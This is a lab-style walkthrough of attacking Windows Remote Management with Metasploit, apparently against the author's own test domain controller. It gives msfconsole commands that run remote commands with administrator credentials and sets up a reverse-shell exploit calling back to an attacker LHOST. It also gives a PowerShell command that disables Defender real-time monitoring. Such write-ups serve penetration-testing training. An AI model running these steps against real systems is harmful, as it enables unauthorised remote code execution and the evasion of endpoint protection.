In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems. exploitation: Open kali for scanning and exploitation: Open up msfconsole for exploitation part: sudo msfconsole use auxiliary/scanner/winrm/winrm_cmd msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140 RHOSTS => 192.168.83.140 msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator USERNAME => Administrator msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1 PASSWORD => P@ssword1 By default the command that will execute it is ipconfig /all Remember the setup of localuser for winrm access where we gave access to the user sysadmin , let’s try that: It actually worked. Now let’s try for Remote shell: msf6 > use exploit/windows/winrm/winrm_script_exec msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140 msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128 Also turn off real time protection in your windwos server , because it will quarantine the execution. use this command on powershell into your DC Set-MpPreference -DisableRealtimeMonitoring $true 3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit. 4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let’s see the options:
...